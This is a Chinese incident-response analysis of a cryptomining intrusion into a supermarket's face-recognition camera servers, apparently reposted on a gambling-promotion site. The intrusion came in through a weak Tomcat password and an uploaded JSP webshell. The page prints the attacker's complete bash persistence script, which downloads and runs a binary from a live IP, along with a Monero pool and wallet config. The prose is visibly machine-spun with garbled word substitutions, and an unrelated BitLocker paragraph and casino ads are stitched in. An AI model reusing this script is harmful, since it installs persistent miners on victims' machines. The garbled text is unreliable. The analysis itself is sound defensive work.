针对智能超市摄像头的进击链分析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

针对智能超市摄像头的进击链分析

申博_安全防护 申博 263次浏览 未收录 0个评论

如何从TPM中提取BitLocker私钥

BitLocker的运行原理 BitLocker驱动器加密它是在Windows Vista中新增的一种数据保护功能,主要用于解决一个人们越来越关心的问题:由计算机设备的物理丢失导致的数据失窃或恶意泄漏。在新一代操作系统Windows 8.1中也能使用此加密驱动。

0x00、媒介

伴随着数字化海潮在智能超市的运用,越来越多的线下门店都开始使用智能体系,包孕:人脸辨认体系、小顺序商城、会员营销体系、和付出平台。人脸辨认,能够资助商家辨认vip用户,辨认进入门店人脸心情剖析满意度,刷脸付出,然后通太小顺序商城线上线下联动,完成全部贩卖流程。后端管控中台,做精准营销等。然则这一切都离不开后端IT体系的支撑。

0x01、入侵排查

本次被入侵的体系为承载人脸辨认的摄像头体系,在态势感知产物监控告警中,我们发明tomcat目次下涌现了webshell。同时,另有对外衔接的挖矿IP地点。

目次为:usr/⁨local⁩/⁨tomcat⁩/⁨webapps⁩/⁨mTQf/m.jsp

详细查看后发明是jsp File Browser。上传、下载文件功用,为今后入侵打下基本。

针对智能超市摄像头的进击链分析

枚举历程信息后,我们发明:

root     10177  0.0  0.0 106336  1632 ?        S     2018   0:11 /bin/bash ./systems
root     13156  0.0  0.0 107148  2524 ?        S    Mar18   0:27 /bin/sh /tmp/javax/config.sh

同时,我们在tmp目次傍边发明了下载剧本。

下载剧本以下:

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

剧本大抵的意义:是不是存在反复下载检测,增加启动项,一向监控lsys文件开释存在,若是没有去http://103.55.13.68:13333/lsys下载顺序,然后增加实行权限。运转lsys elf文件。

#!/bin/bash

if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then
    echo ""
else
    echo "sh /etc/chongfu.sh &" >> /etc/rc.local
fi

while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "/tmp/lsys" | grep -v grep | wc -l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "/tmp/lsys" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://103.55.13.68:13333/lsys
                ./wget -P /tmp/  http://103.55.13.68:13333/lsys &> /dev/null
                chmod 755 /tmp/lsys
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/lsys &
        #./lsys &
    elif [[ $Centos_sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "lsys" | grep -v grep | awk '{print $2}'); do
            Centos_sshd_killn=$(($Centos_sshd_killn-1))
            if [[ $Centos_sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    Centos_ssh_killn=$(ps aux | grep "/tmp/lsys" | grep -v grep | wc -l)
    if [[ $Centos_ssh_killn -eq 0 ]]; then
        if [ ! -f "/tmp/lsys" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P .  http://103.55.13.68:13333/lsys
                ./wget -P /tmp/  http://103.55.13.68:13333/lsys &> /dev/null
                chmod 755 /tmp/lsys
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/lsys &
        #./lsys &
    elif [[ $Centos_ssh_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "lsys" | grep -v grep | awk '{print $2}'); do
            Centos_ssh_killn=$(($Centos_ssh_killn-1))
            if [[ $Centos_ssh_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 900
done

下载了lsys文件剖析后:

1、沙箱剖析效果:

针对智能超市摄像头的进击链分析

接见的歹意域名恰好和态势感知体系报告请示的域名雷同。同时下载挖矿设置装备摆设剧本。

2、矿池地点:

"pools": [
        {
            "url": "pool.supportxmr.com:3333",
            "user": "46ARamtqSyNEtvXJRATeCWF5KgpzufsXPjgrDn6UA3wahsaU1nysFQoYs9q6xa484o83z4p28Msr9V4z8fXLaXfS1PXfpuo",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": -1,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null
        }

3、同时顺序伪形成ssdh、sshd2和sshk。

0x02、进击链总结

针对智能超市摄像头的进击链分析

和用户确认过,Tomcat服务器web治理体系登陆密码为123456,歹意职员登录web掌握台后,上传了JSP File Browser,然后经由过程JSP File Browser上传了下载sh剧本而且实行。剧本实行后下载了lsys二进制歹意顺序挖矿和僵尸收集外联。

腾讯安全科恩实验室:2018年IoT安全白皮书


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明针对智能超市摄像头的进击链分析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址